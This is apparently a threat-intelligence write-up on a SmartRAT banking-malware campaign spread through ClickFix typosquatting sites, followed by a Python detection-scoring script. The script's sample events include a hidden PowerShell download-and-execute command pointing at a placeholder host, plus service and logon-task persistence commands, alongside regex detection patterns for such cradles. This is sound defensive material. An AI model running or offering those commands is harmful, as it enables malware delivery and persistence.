At a Glance
- Malware Family: SmartRAT (also tracked as Banana RAT)
- Threat Actor: Suspected Brazilian cybercriminal groups
- Targets or Victims: Customers of major Brazilian banks. ThreatLabz observed multiple instances of the campaign.
- Delivery Vector: AI-generated typosquatting websites using ClickFix lures.
- Key Capabilities: Remote access, screen streaming, QR code interception, and keylogging.
- Source: Zscaler ThreatLabz and Trend Micro.
TL;DR
Attackers use AI-generated typosquatting sites and ClickFix lures to deliver SmartRAT and steal financial data. They trick victims into running a malicious PowerShell command by presenting a fake CAPTCHA followed by a fake system error screen. No software vulnerability is exploited; the victim executes the payload. Administrators should monitor PowerShell activity, especially commands launched from the Run dialog, to catch these infections early.
Delivery
Attackers register typosquatting domains to impersonate popular banking portals. In this case, they impersonated a major Brazilian bank. They used the domain cartaobb[.]com to mimic the official site. Threat actors use website builders to craft these lures quickly. Zscaler ThreatLabz notes, “The rise of AI-powered website builders is enabling cybercriminals to generate fraudulent web pages quickly with high-fidelity visuals and at scale.”
The malicious page includes active anti-inspection measures. A script intercepts the keyboard shortcuts that open the browser's developer tools, and it repeatedly clears the console if debugging tools are opened anyway. This slows analysis of the page source. When a victim visits the site, a fake Cloudflare CAPTCHA appears. Clicking the CAPTCHA triggers the ClickFix lure: the script copies a malicious command to the clipboard and forces the browser into fullscreen mode.
Finally, it displays a fake Blue Screen of Death. This fake system recovery screen instructs the victim to open the Windows Run dialog and paste the clipboard contents, which is the malicious command. Other vendors track similar activity across different regions. Trend Micro documented this malware family as Banana RAT using a different delivery path.
Infection Chain

The attack progresses when the user runs the pasted PowerShell command. This command acts as a stealth dropper. It hides its console window immediately using Windows API calls. It then downloads a decoy text file from a remote server and fetches a secondary payload, served from a PHP page, that contains encrypted scripts. The dropper decodes hardcoded strings to retrieve the decryption keys and executes the decrypted secondary blob directly in memory, so the core SmartRAT executable is never written to disk as a plain file.
The malware generates a unique identifier using the machine details. The malware then checks its current system privilege level. If it lacks administrative rights, it prompts for elevation. It repeatedly shows User Account Control dialogs until the user approves.
Once elevated, the malware compiles C# code at runtime. This code installs a Windows service named MicrosoftEdgeUpdateCore, mimicking the legitimate Edge updater. The service runs under the SYSTEM account. The malware also establishes persistence via a logon-triggered scheduled task, so the payload runs every time the victim logs in.
Command-and-Control and Data-Exfiltration Behavior
The malware communicates with its server over a TCP connection and encrypts all traffic with AES in CBC mode. It generates a unique identity token for the infected machine and sends it on connection. If the primary domain fails to resolve or connect, it falls back to a hardcoded IP address.
Upon connection, the malware enters a continuous monitoring loop. It tracks user inactivity and processes server commands. The threat actor can execute arbitrary PowerShell commands remotely. Furthermore, the malware monitors active window titles for banking keywords. When it detects a targeted bank, it sends an alert.
The attacker can then deploy a fake, bank-branded overlay that silently captures the user's login credentials. The malware also features an automatic QR code scanner. It detects QR codes on the screen using a pixel-contrast algorithm and sends the detected codes to the operator. The operator can replace the legitimate QR code with a fraudulent one, so the victim unknowingly authorizes a malicious transaction when they scan it.
Defense or Detection Guidance
Security teams must block the known typosquatting domains immediately. Researchers found authentication flaws in the web-based command panel and used them to map the entire operation. Defenders should monitor endpoints for unusual PowerShell execution patterns: look for PowerShell launched from the Run dialog (the parent process is explorer.exe), for hidden-window and download-and-execute flags, and for scripts run from public or world-writable folders. Enforce strict application control to prevent unauthorized script execution.
Organizations must train users to recognize fake browser and system errors. Emphasize that legitimate services never ask users to paste commands into the Run dialog or a terminal. Ensure your endpoint detection tools can spot inline C# compilation spawned by PowerShell. Search for suspicious services and scheduled tasks posing as Edge updates, and check that anything named after the Edge updater actually runs from Microsoft's installation path. Monitor for processes writing logs to hidden diagnostic folders. Blocking access to unverified newly registered domains reduces the attack surface. This campaign exploits no software vulnerability, so patching alone does not stop it; user awareness and execution controls carry the weight here, although patch management still matters for campaigns that chain social engineering with known exploits.
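The scoring below is an added example, not Zscaler or Trend Micro code, and it illustrates both the Infection Chain section and the detection guidance above: it weights process-creation events for the observable steps of the chain (PowerShell spawned by explorer.exe from the Run dialog, hidden-window and download-and-execute flags, in-memory execution, inline C# compilation, a service or logon task named after the Edge updater, payloads under public folders). Only the service name MicrosoftEdgeUpdateCore comes from the article; the rule weights, the threshold, the field layout (modelled on Sysmon Event ID 1) and every sample event are assumptions constructed for this example, not real telemetry.

```python
"""Score constructed process-creation events for the ClickFix -> PowerShell
dropper -> persistence chain. Added example, not vendor code. Event fields
mimic Sysmon Event ID 1; all sample events below are constructed."""
import re
from dataclasses import dataclass
from typing import Callable


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_pwsh(path: str) -> bool:
    return _base(path) in {"powershell.exe", "pwsh.exe"}


def _cl(pattern: str, e: ProcEvent) -> bool:
    return re.search(pattern, e.command_line, re.IGNORECASE) is not None


# (name, weight, predicate). Weights are assumptions chosen for this example.
RULES: list[tuple[str, int, Callable[[ProcEvent], bool]]] = [
    # Win+R launches its target with explorer.exe as the parent process
    ("powershell_from_run_dialog", 2,
     lambda e: _is_pwsh(e.image) and _base(e.parent_image) == "explorer.exe"),
    ("hidden_window", 2,
     lambda e: _is_pwsh(e.image) and _cl(r"-w(indowstyle)?\s+hidden", e)),
    ("execution_policy_bypass", 1,
     lambda e: _is_pwsh(e.image) and _cl(r"-e(xecutionpolicy|p)\s+bypass", e)),
    ("download_cradle", 3,
     lambda e: _cl(r"downloadstring|downloadfile|invoke-webrequest|"
                   r"invoke-restmethod|\b(iwr|irm)\b|net\.webclient", e)),
    ("in_memory_exec", 2, lambda e: _cl(r"invoke-expression|\biex\b", e)),
    ("encoded_command", 2,
     lambda e: _is_pwsh(e.image) and _cl(r"-e(ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{20,}", e)),
    # The real updater lives under ...\Microsoft\EdgeUpdate\ and is not
    # registered via sc.exe, schtasks.exe or PowerShell on an end-user host
    ("edge_update_lookalike", 4,
     lambda e: _cl(r"microsoftedgeupdate", e)
     and _base(e.image) in {"sc.exe", "schtasks.exe", "powershell.exe", "pwsh.exe"}),
    ("logon_task_created", 3,
     lambda e: _base(e.image) == "schtasks.exe" and _cl(r"/create", e) and _cl(r"/sc\s+onlogon", e)),
    # Inline C# compilation from PowerShell (Add-Type) spawns the .NET compiler
    ("inline_csharp_compile", 4,
     lambda e: _base(e.image) in {"csc.exe", "vbc.exe"} and _is_pwsh(e.parent_image)),
    ("public_folder_payload", 1, lambda e: _cl(r"\\users\\public\\|\\programdata\\", e)),
]


def score_event(e: ProcEvent) -> tuple[int, list[str]]:
    """Return (total weight, names of matching rules) for one event."""
    hits = [name for name, _, pred in RULES if pred(e)]
    return sum(w for name, w, _ in RULES if name in hits), hits


def detect(events: list[ProcEvent], threshold: int = 4) -> list[dict]:
    """Events whose score reaches the threshold, in input order."""
    alerts = []
    for i, e in enumerate(events):
        score, hits = score_event(e)
        if score >= threshold:
            alerts.append({"index": i, "score": score, "rules": hits, "image": _base(e.image)})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (hypothetical paths and URL, not real indicators).
SAMPLE_EVENTS = [
    ProcEvent(PS, r"""powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/p')" """,
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\sc.exe",
              r'sc create MicrosoftEdgeUpdateCore binPath= "C:\Users\Public\EdgeCore\svc.exe" start= auto obj= LocalSystem', PS),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\victim\AppData\Local\Temp\k2x1p3.cmdline"', PS),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "MicrosoftEdgeUpdateCore" /sc onlogon /rl highest /tr "powershell -w hidden -f C:\Users\Public\EdgeCore\upd.ps1"', PS),
    # Benign: an admin opening an interactive PowerShell from the Run dialog
    ProcEvent(PS, f'"{PS}"', r"C:\Windows\explorer.exe"),
    # Benign: the genuine Edge updater service started by the SCM
    ProcEvent(r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
              r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc',
              r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints four alerts (the dropper command, the service creation, the compiler launch and the logon task) and stays silent on the two benign events. The weights are deliberately additive so that a single weak signal such as PowerShell opened from Run does not fire on its own, while the combination the article describes scores far above the threshold; tune them against your own baseline before deploying anything like this.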